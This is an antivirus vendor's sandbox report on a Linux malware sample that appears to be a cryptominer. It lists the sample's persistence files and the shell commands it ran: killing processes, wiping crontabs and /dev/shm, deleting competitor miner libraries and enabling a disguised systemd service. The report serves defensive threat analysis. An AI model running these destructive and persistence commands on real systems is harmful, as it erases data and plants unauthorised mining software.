Linux.Siggen.6472
Added to the Dr.Web virus database: 2024-01-22
Virus description added: 2024-01-22
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/cron.d/localupdatemanager.cron
- /etc/rc.local
Malicious functions:
Manages services:
- ['systemctl', 'stop', 'bot']
- ['systemctl', 'enable', 'localupdatedaemon']
- ['systemctl', 'start', 'localupdatedaemon']
Launches processes:
- /bin/bash -c sysctl -w vm.nr_hugepages=102400
- /bin/sh -c rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- sysctl -w vm.nr_hugepages=102400
- rm /etc/zclient
- /bin/bash -c rm -rf /etc/.localconfig
- /bin/bash -c (crontab -l ; echo \x220 */12 *
- /bin/sh -c systemctl enable localupdatedaemon && systemctl start localupdatedaemon
- rm -rf /etc/.localconfig
- crontab -r
- /bin/sh -c kill -9 /tmp/*
- /bin/bash -c pkill /tmp/*
- /bin/bash -c killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager
- /bin/sh -c killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager
- /bin/sh -c (crontab -l ; echo \x220 */12 *
- /bin/bash -c rm -rf /dev/shm/*
- rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- /bin/bash -c crontab -r
- /bin/bash -c rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so
- /bin/sh -c rm -rf /etc/.localconfig
- /bin/bash -c kill -9 /tmp/*
- /bin/sh -c pkill /tmp/*
- /bin/sh -c systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot
- /bin/sh -c crontab -r
- /bin/sh -c rm /etc/zclient && rm /etc/zdaemon
- /bin/sh -c rm -rf /dev/shm/*
- rm -rf /dev/shm/*
- rm -rf /etc/cron.d/zdaemon
- /bin/bash -c rm /etc/zclient && rm /etc/zdaemon
- /bin/sh -c rm -rf /etc/cron.d/zdaemon
- /bin/sh -c sysctl -w vm.nr_hugepages=102400
- /bin/bash -c systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot
- /bin/bash -c rm -rf /etc/cron.d/zdaemon
- /usr/bin/pgrep pkill /tmp/systemd-private-38bb8d12207944cabaef5b72462c0311-systemd-logind.service-hNpSKi /tmp/systemd-private-38bb8d12207944cabaef5b72462c0311-systemd-timesyncd.service-xVMmki /tmp/tmux-0
- /bin/bash -c systemctl enable localupdatedaemon && systemctl start localupdatedaemon
Performs operations with the file system:
Modifies file access rights:
Creates folders:
Deletes folders:
Creates or modifies files:
- /etc/hosts
- /usr/lib/systemd/system/localupdatedaemon.service
- /root/.bashrc
- /proc/sys/vm/nr_hugepages
Deletes files:
Network activity:
Establishes connection:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects OS information
Collects CPU information
Curing recommendations